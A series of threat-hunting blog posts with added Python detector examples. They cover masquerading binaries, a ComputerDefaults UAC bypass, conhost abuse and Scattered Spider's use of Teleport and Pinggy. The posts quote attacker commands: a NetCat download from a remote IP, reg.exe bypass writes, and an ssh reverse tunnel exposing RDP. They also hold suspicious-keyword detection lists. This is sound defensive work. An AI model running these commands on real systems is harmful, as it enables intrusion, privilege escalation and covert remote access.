Posts

192. I'm Not Sure If I Want to Masquerade It

Hello everyone! As it's Friday, let's look at a funny case, at least in my opinion. And it's one more time about masquerading. The case itself is related to exploiting public-facing applications and deploying coinminers. Nothing special. But there are a few interesting behaviors!

The adversary downloads NetCat from a remote server:

(New-Object Net.WebClient).DownloadFile('hXXp://212.78.4[.]241:8081/docs/nc.exe', 'C:\programdata\userinit.exe')

As you can see, the threat actors masqueraded NetCat to look like a legitimate process, but at the same time copied and renamed cmd.exe:

cmd c/ copy C:\Windows\System32\cmd.exe C:\ProgramData\c.exe

So, once again we are dealing with renamed command and scripting interpreters:

event_type: "processcreatewin" AND proc_file_originalfilename: "cmd.exe" AND NOT proc_file_name: "cmd.exe"

And also command and scripting interpreters in uncommon locations:

event_type: "processcreatewin"...

191. Some Threat Actors Just Want to Be Detected

Hello everyone! I'm sure you've seen cases where adversaries really wanted the defenders to catch them. Yes, in some cases they may call the payload malware.exe or... Let's look at the example I spotted today: You got it right. The filename is payload.exe. That's it. So, why not hunt for such suspicious filenames? For example:

event_type: "processcreatewin" AND proc_file_path: "payload"

Another interesting example is PDB paths. In some cases, they may be REALLY suspicious, for example:

Y:\Hack\backdoor\3-exe-attack\temp\UAC_Elevated\win32\UAC_Elevated.pdb

So, if your EDR solution supports collecting PDB paths, you can also use them for detection and hunting:

event_type: "processcreatewin" AND proc_file_pdb_path: ("payload" OR "hack" OR "backdoor" OR "attack" OR "bypass" OR "dropper" OR "exploit" OR "keylog" OR "trojan" OR "spy")

See you tomorrow!

190. Does Renaming Legitimate Binaries Really Mask Them?

Hello everyone! Today I want to look at another stealer - NordDragonScan. Once again, the adversary uses a malicious LNK file to download an HTA - a very common behavior. But that's not the thing that caught my attention, it's the following: "The malicious HTA file copies the legitimate PowerShell.exe binary to the path "C:\Users\Public\Documents\install.exe" to mask itself". So, here we have a renamed PowerShell.exe binary, and also a quite suspicious staging folder - it looks like the adversary made things even noisier! We already talked about renamed system binaries, and here's another example:

event_type: "processcreatewin" AND proc_file_originalfilename: "powershell.exe" AND NOT proc_file_name: "powershell.exe"

And also another suspicious staging folder:

event_type: "processcreatewin" AND proc_file_path: "Public\\Documents"

See you tomorrow!
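The file-based hunts from posts 192, 191 and 190 (renamed interpreters, self-incriminating file names and PDB paths, the Public\Documents staging folder) can be expressed as one small checker over process-creation events. The block below is an added example in Python and is not code from the original posts. It uses the field names quoted in the posts' queries; the "interpreter outside the Windows directory" rule is an assumption standing in for the truncated "uncommon locations" query in post 192, and the sample events are constructed, not real telemetry.

```python
"""Added example (not from the original posts): the file-based hunts from posts 192,
191 and 190 applied to process-creation events.

Field names follow the queries quoted in the posts (proc_file_name,
proc_file_originalfilename, proc_file_path, proc_file_pdb_path). The events
below are constructed for this example, not real telemetry; the "interpreter
outside the Windows directory" rule is an assumption standing in for the
truncated "uncommon locations" query in post 192."""
from typing import Dict, List

# Interpreters whose PE OriginalFilename is expected to match the on-disk name
INTERPRETERS = {"cmd.exe", "powershell.exe"}

# Keyword lists from post 191 (matched case-insensitively as substrings)
NAME_KEYWORDS = ("payload",)
PDB_KEYWORDS = ("payload", "hack", "backdoor", "attack", "bypass",
                "dropper", "exploit", "keylog", "trojan", "spy")

# Staging folder from post 190
STAGING_FOLDERS = ("\\users\\public\\documents\\",)


def hunt(event: Dict[str, str]) -> List[str]:
    """Return the names of the hunts that fire on a single processcreatewin event."""
    hits: List[str] = []
    if event.get("event_type") != "processcreatewin":
        return hits
    name = event.get("proc_file_name", "").lower()
    original = event.get("proc_file_originalfilename", "").lower()
    path = event.get("proc_file_path", "").lower()
    pdb = event.get("proc_file_pdb_path", "").lower()

    # Posts 192 / 190: the PE header says cmd.exe or powershell.exe, the disk name differs
    if original in INTERPRETERS and name != original:
        hits.append("renamed_interpreter")
    # Post 192: an interpreter executing from outside C:\Windows (assumed rule)
    if original in INTERPRETERS and not path.startswith("c:\\windows\\"):
        hits.append("interpreter_uncommon_location")
    # Post 190: anything executing from the Public\Documents staging folder
    if any(folder in path for folder in STAGING_FOLDERS):
        hits.append("staging_folder")
    # Post 191: self-incriminating file name
    if any(k in name for k in NAME_KEYWORDS):
        hits.append("suspicious_filename")
    # Post 191: self-incriminating PDB path
    if any(k in pdb for k in PDB_KEYWORDS):
        hits.append("suspicious_pdb_path")
    return hits


# Constructed sample events modelled on the three posts (not real telemetry)
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "c.exe",
     "proc_file_originalfilename": "cmd.exe",
     "proc_file_path": "C:\\ProgramData\\c.exe", "proc_file_pdb_path": ""},
    {"event_type": "processcreatewin", "proc_file_name": "install.exe",
     "proc_file_originalfilename": "powershell.exe",
     "proc_file_path": "C:\\Users\\Public\\Documents\\install.exe", "proc_file_pdb_path": ""},
    {"event_type": "processcreatewin", "proc_file_name": "payload.exe",
     "proc_file_originalfilename": "payload.exe",
     "proc_file_path": "C:\\Users\\bob\\Downloads\\payload.exe",
     "proc_file_pdb_path": "Y:\\Hack\\backdoor\\3-exe-attack\\temp\\UAC_Elevated\\win32\\UAC_Elevated.pdb"},
    {"event_type": "processcreatewin", "proc_file_name": "cmd.exe",
     "proc_file_originalfilename": "cmd.exe",
     "proc_file_path": "C:\\Windows\\System32\\cmd.exe", "proc_file_pdb_path": ""},
]


def hunt_all(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each event's file path to the hunts that fired on it (empty list = clean)."""
    return {e["proc_file_path"]: hunt(e) for e in events}


if __name__ == "__main__":
    for file_path, hits in hunt_all(SAMPLE_EVENTS).items():
        print(f"{file_path}: {hits or 'clean'}")
```

The renamed-interpreter rule relies on the EDR populating the PE OriginalFilename field; a copied binary keeps its version resource, so the mismatch survives the rename the posts describe. The keyword lists are substring matches and will need tuning against your own telemetry (a developer's "spy" or "attack" project path is a classic false positive).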

189. Adversaries Abuse ComputerDefaults.exe to Bypass the UAC

Hello everyone! There are quite a few well-known ways to bypass User Account Control (UAC). Some are often used in the wild, some are not. Let's look at a recent example from Kaspersky's report on Batavia spyware. The adversary abused ComputerDefaults.exe to bypass UAC. To do it, the threat actor modified two registry keys using reg.exe:

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f /ve /t REG_SZ /d "%temp%\windowsmsg.exe <arg>"

It means we can hunt for related registry value modification events:

event_type: "registryvaluesetwin" AND reg_key_path: "ms-settings\\shell\\open\\command"

Also, check for suspicious processes spawned as a child process of ComputerDefaults.exe:

event_type: "processcreatewin" AND proc_p_file_path: "computerdefaults.exe"

See you tomorrow!
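The two hunts in this post are stronger together: a write to the ms-settings handler key followed shortly by a child of ComputerDefaults.exe on the same host is the full bypass sequence, while either alone can have benign explanations. The block below is an added example in Python, not code from the original post, that correlates the two. reg_key_path and proc_p_file_path are the field names from the post's queries; host, ts (epoch seconds) and reg_value_name are assumed fields, and all sample events are constructed.

```python
"""Added example (not from the original post): the two hunts from post 189 combined
into one correlation. reg_key_path and proc_p_file_path are the field names from
the post's queries; host, ts (epoch seconds) and reg_value_name are assumed fields
and all events below are constructed for this example."""
from collections import defaultdict
from typing import Dict, List

# Registry key from the post (compared case-insensitively as a substring)
UAC_HANDLER_KEY = "ms-settings\\shell\\open\\command"
# How long after the handler key is written a ComputerDefaults.exe child counts as linked
WINDOW_SECONDS = 300


def correlate(events: List[Dict], window: int = WINDOW_SECONDS) -> List[Dict]:
    """One alert per process spawned by ComputerDefaults.exe, flagged with whether the
    ms-settings handler key was written on the same host within `window` seconds before."""
    handler_writes: Dict[str, List[int]] = defaultdict(list)  # host -> write timestamps
    alerts: List[Dict] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        etype = ev.get("event_type")
        if etype == "registryvaluesetwin" and UAC_HANDLER_KEY in ev.get("reg_key_path", "").lower():
            handler_writes[ev["host"]].append(ev["ts"])
        elif etype == "processcreatewin" and "computerdefaults.exe" in ev.get("proc_p_file_path", "").lower():
            preceded = any(0 <= ev["ts"] - t <= window for t in handler_writes[ev["host"]])
            alerts.append({
                "host": ev["host"],
                "ts": ev["ts"],
                "child": ev.get("proc_file_path", ""),
                "handler_key_written": preceded,
                "severity": "high" if preceded else "medium",
            })
    return alerts


# Constructed sample events (not real telemetry)
SAMPLE_EVENTS = [
    # ws-01: the pattern from the post, reg.exe writes both values, then the payload runs
    {"event_type": "registryvaluesetwin", "host": "ws-01", "ts": 1000,
     "reg_key_path": "HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command",
     "reg_value_name": "DelegateExecute"},
    {"event_type": "registryvaluesetwin", "host": "ws-01", "ts": 1001,
     "reg_key_path": "HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command",
     "reg_value_name": "(Default)"},
    {"event_type": "processcreatewin", "host": "ws-01", "ts": 1030,
     "proc_p_file_path": "C:\\Windows\\System32\\ComputerDefaults.exe",
     "proc_file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\windowsmsg.exe"},
    # ws-02: a child of ComputerDefaults.exe with no preceding handler-key write
    {"event_type": "processcreatewin", "host": "ws-02", "ts": 2000,
     "proc_p_file_path": "C:\\Windows\\System32\\ComputerDefaults.exe",
     "proc_file_path": "C:\\Windows\\System32\\cmd.exe"},
    # ws-03: a handler-key write with nothing following it
    {"event_type": "registryvaluesetwin", "host": "ws-03", "ts": 3000,
     "reg_key_path": "HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command",
     "reg_value_name": "DelegateExecute"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The handler-key write on ws-03 produces no alert on its own; in practice it still deserves a lower-priority signal of its own, since HKCU\Software\Classes\ms-settings has no legitimate reason to exist for most users, and the correlation here only promotes it when the auto-elevated binary actually spawns something afterwards.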

188. Adversaries Abuse Console Window Host More and More Often

Hello everyone! We already talked about Console Window Host (conhost.exe) abuse. Usually threat actors use it with the "--headless" flag to hide the window from the user upon execution. Unit 42 conducted research on malicious LNK files, and guess what? Yes, Console Window Host is among the most often used system targets:

powershell.exe
cmd.exe
rundll32.exe
conhost.exe
wscript.exe
forfiles.exe
mshta.exe

What does it mean? It's definitely worth a hunting query:

event_type: "processcreatewin" AND proc_file_name: "conhost.exe" AND cmdline: "headless"

See you tomorrow!

187. Scattered Spider Started to Abuse Teleport

Hello everyone! If you checked the report I shared yesterday, you should have noticed another interesting legitimate tool abused by Scattered Spider - Teleport. The adversary installed it on compromised servers to establish a persistent remote command-and-control (C2) channel. We can start by hunting for downloads of Teleport binaries, for example:

event_type: "processcreatenix" AND proc_file_name: "curl" AND cmdline: "teleport.dev"

Also, you may look for Teleport configuration file modification events:

event_type: "filewrite" AND file_path: "teleport.yaml"

See you tomorrow!

186. Pinggy: Another Tunneling Solution Abused by Adversaries

Hello everyone! Have you read CrowdStrike's recent report on SCATTERED SPIDER activity? If not, make sure you do! It contains lots of valuable information on the adversary's tactics, techniques and procedures. One of them is abusing Pinggy, another privacy-focused tunneling solution. It's interesting that threat actors don't even have to drop its binary on the compromised system; they can just use ssh, for example:

ssh -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no -o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io

So, the first thing to hunt for is "pinggy" in the command line:

event_type: "processcreatewin" AND cmdline: "pinggy"

Another opportunity is hunting for Pinggy-related domains:

event_type: "dnsreq" AND dns_rname: ("pinggy.io" OR "pinggy.link")

See you tomorrow!
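A substring match on "pinggy" catches this exact command line, but the same ssh invocation tells a defender more: a remote forward (-R) exposing local RDP, SSH on 443, and host key checking switched off, all of which hold even when the provider changes. The block below is an added example in Python, not code from the original post or from CrowdStrike, that parses an ssh command line into those pieces. The flags handled are standard OpenSSH client flags, the domains are the ones from the post's DNS hunt, and the benign command line used for comparison is constructed.

```python
"""Added example (not from the original post): parsing an ssh command line for the
reverse-tunnel pattern described in post 186. The ssh flags handled are standard
OpenSSH client flags; the Pinggy domains come from the post's DNS hunt, and the
benign command line used for comparison is constructed."""
import shlex
from typing import Dict, List

# Domains from the post's DNS hunt
TUNNEL_DOMAINS = ("pinggy.io", "pinggy.link")
# Local services whose exposure through a reverse tunnel gets a named finding
SENSITIVE_PORTS = {3389: "rdp", 22: "ssh", 445: "smb", 5985: "winrm", 5986: "winrm"}
# OpenSSH client flags that take a value (attached, e.g. -R0:..., or as the next argv)
VALUE_FLAGS = set("bcDEeFIiJLlmOopQRSWwB")


def parse_ssh_cmdline(cmdline: str) -> Dict:
    """Extract destination host, port, -R specs and -o options from an ssh command line."""
    argv = shlex.split(cmdline)
    info: Dict = {"host": None, "port": 22, "reverse_forwards": [], "options": {}}
    i = 1  # argv[0] is ssh itself
    while i < len(argv):
        arg = argv[i]
        if arg.startswith("-") and len(arg) > 1 and arg[1] in VALUE_FLAGS:
            flag, value = arg[1], arg[2:]
            if not value:  # value is the next argument
                i += 1
                value = argv[i] if i < len(argv) else ""
            if flag == "R":
                info["reverse_forwards"].append(value)
            elif flag == "p" and value.isdigit():
                info["port"] = int(value)
            elif flag == "o" and "=" in value:
                key, val = value.split("=", 1)
                info["options"][key.lower()] = val.lower()
        elif arg.startswith("-"):
            pass  # boolean flag such as -N, -f or -q
        elif info["host"] is None:
            info["host"] = arg.rsplit("@", 1)[-1].lower()  # drop the user@ part
        i += 1
    return info


def assess(cmdline: str) -> List[str]:
    """Return the findings a hunt would raise for one ssh command line."""
    info = parse_ssh_cmdline(cmdline)
    findings: List[str] = []
    host = info["host"] or ""
    if any(host == d or host.endswith("." + d) for d in TUNNEL_DOMAINS):
        findings.append("pinggy_destination")
    for spec in info["reverse_forwards"]:
        # -R [bind_address:]port:host:hostport -> the last field is the exposed local port
        parts = spec.split(":")
        if len(parts) >= 3 and parts[-1].isdigit():
            port = int(parts[-1])
            service = SENSITIVE_PORTS.get(port)
            findings.append(f"reverse_tunnel_to_{service}" if service else f"reverse_tunnel_to_port_{port}")
    if info["options"].get("stricthostkeychecking") == "no":
        findings.append("host_key_check_disabled")
    if info["port"] == 443 and info["reverse_forwards"]:
        findings.append("tunnel_over_443")
    return findings


# Command line quoted in the post, and a constructed benign one for comparison
PINGGY_CMDLINE = ("ssh -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no "
                  "-o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io")
BENIGN_CMDLINE = "ssh -i ~/.ssh/id_ed25519 -p 22 admin@bastion.corp.example"

if __name__ == "__main__":
    for line in (PINGGY_CMDLINE, BENIGN_CMDLINE):
        print(f"{line}\n  -> {assess(line) or 'no findings'}")
```

On Windows endpoints the same logic applies to the built-in OpenSSH client (ssh.exe), which is why the post's cmdline hunt uses processcreatewin; the reverse_tunnel_to_rdp finding is the one worth paging on, since a -R forward to 3389 has almost no legitimate use on a workstation.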